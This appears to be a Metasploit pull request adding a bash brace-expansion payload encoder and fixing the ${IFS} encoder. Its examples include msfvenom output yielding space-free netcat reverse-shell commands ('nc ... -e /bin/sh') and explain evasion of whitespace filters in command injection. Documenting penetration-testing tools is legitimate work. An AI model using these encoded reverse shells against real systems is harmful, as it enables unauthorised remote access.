Add brace expansion encoder and update ${IFS} encoder

[wvu]

Description

Brace expansion can be used as a whitespace encoder in supported shells.

wvu@kharak:~$ {echo,this,is,a,test}
this is a test
wvu@kharak:~$

Caveats

This encoder assumes that shell metacharacters like { and } will already be escaped or quoted in the unencoded payload. Note that you may not need to escape those metachars if used without special meaning.

For an example, consider xargs -I {}:

wvu@kharak:~$ xargs -I {} < /dev/null; echo $?
0
wvu@kharak:~$

Naturally, the shell you're injecting into needs to have brace expansion. bash is a common one, and sometimes /bin/sh is symlinked to it.

Verification Steps

• Test cmd/ifs encoder for regressions
  • Test generated payloads
  • Test arbitrary strings
• Test new cmd/brace encoder
  • Test generated payloads
  • Test arbitrary strings

Examples

wvu@kharak:~/metasploit-framework:feature/brace$ ./msfvenom -p cmd/unix/reverse_netcat_gaping -e cmd/brace -b "\x20" lhost=127.0.0.1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 30 (iteration=0)
cmd/brace chosen with final size 30
Payload size: 30 bytes
{nc,127.0.0.1,4444,-e,/bin/sh}
wvu@kharak:~/metasploit-framework:feature/brace$ ^brace^ifs
./msfvenom -p cmd/unix/reverse_netcat_gaping -e cmd/ifs -b "\x20" lhost=127.0.0.1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/ifs
cmd/ifs succeeded with size 48 (iteration=0)
cmd/ifs chosen with final size 48
Payload size: 48 bytes
nc${IFS}127.0.0.1${IFS}4444${IFS}-e${IFS}/bin/sh
wvu@kharak:~/metasploit-framework:feature/brace$

wvu@kharak:~/metasploit-framework:feature/brace$ echo -n "echo hello, world" | ./msfvenom -a cmd --platform unix -e cmd/brace -b "\x20" lhost=127.0.0.1
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 20 (iteration=0)
cmd/brace chosen with final size 20
Payload size: 20 bytes
{echo,hello\,,world}
wvu@kharak:~/metasploit-framework:feature/brace$ {echo,hello\,,world}
hello, world
wvu@kharak:~/metasploit-framework:feature/brace$

[busterb]

Looks pretty straightforward to me. Too bad Defcon 26 videos aren't up yet for linking in references!

[busterb]

Release Notes

A new cmd/brace encoder module has been added to the framework. It allows you to encode payloads without spaces in bash using a simple technique. This PR also fixes some issues with the IFS shell payload encoder.